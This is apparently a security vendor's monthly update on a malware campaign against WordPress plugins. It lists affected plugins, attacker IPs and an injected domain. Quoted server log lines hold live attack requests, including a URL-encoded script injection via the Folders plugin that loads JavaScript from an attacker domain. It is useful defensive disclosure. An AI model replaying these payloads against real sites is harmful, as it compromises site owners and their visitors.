This is an update for the long-lasting malware campaign targeting vulnerable plugins since January. Please check our previous updates below:
- Multi-Vector Attack in Server Logs: March 2019
- Plugins Added to Malicious Campaign – April 2019
- Malware Campaign Evolves to Target New Plugins: May 2019
- Plugins Under Attack: June 2019
- Plugins Under Attack: July 2019
- Plugins Under Attack: August 2019
- Plugins Under Attack: September 2019
- Plugins Under Attack: October 2019
Plugins Under Attack: November 2019
Although attackers focused on infecting sites via attack vectors described here, we were able to detect the same behavior aiming plugins at the very end of this month.
Plugins that are continuing to be leveraged by attackers are:
- Rich Reviews
- Kiwi-Social-Share
- Blog Designer
- WP Live Chat Support
- Yellow Pencil Visual Theme Customizer
- Social Warfare
- Yuzo Related Post
- WP-Piwik
Plugin Payloads Added to the Campaign
Folders
46.101.174.128 - type=attachment&width=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Ftop.worldctraffic.com%2Ftop%27%3E%3C%2Fscript%3E%3Cstyle%3E [23/Nov/2019:12:19:33 +0000] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"
Simple Fields
46.101.174.128 - action=simple_fields_do_import&import-json=%7B%0A++++%22field_groups%22%3A+%7B%0A++++++++%221%22%3A+%7B%0A++++++++++++%22id%22%3A+1%2C%0A++++++++++++%22key%22%3A+%22test%22%2C%0A++++++++++++%22slug%22%3A+%22test%22%2C%0A++++++++++++%22name%22%3A+%22test%22%2C%0A++++++++++++%22description%22%3A+%22%22%2C%0A++++++++++++%22repeatable%22%3A+false%2C%0A++++++++++++%22fields%22%3A+%5B%5D%2C%0A++++++++++++%22fields_by_slug%22%3A+%5B%5D%2C%0A++++++++++++%22deleted%22%3A+false%2C%0A++++++++++++%22gui_view%...skipped...%22deleted%22%3A+false%2C%0A++++++++++++%22hide_editor%22%3A+false%2C%0A++++++++++++%22added_with_code%22%3A+false%2C%0A++++++++++++%22field_groups_count%22%3A+1%0A++++++++%7D%0A++++%7D%2C%0A++++%22post_type_defaults%22%3A+%5B%0A++++++++false%0A++++%5D%0A%7D&import-what=textarea&simple-fields-import-type=replace [23/Nov/2019:13:02:05 +0000] "POST /wp-admin/admin-post.php HTTP/1.1"
Malicious Domains and IPs:
IPs:
198.12.70.83
89.238.167.46
181.58.70.192
84.237.142.110
91.215.187.211
46.101.174.128
Domains Injected:
- https[:]//top[.]worldctraffic[.]com/cas?/java.js?t=2&
We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.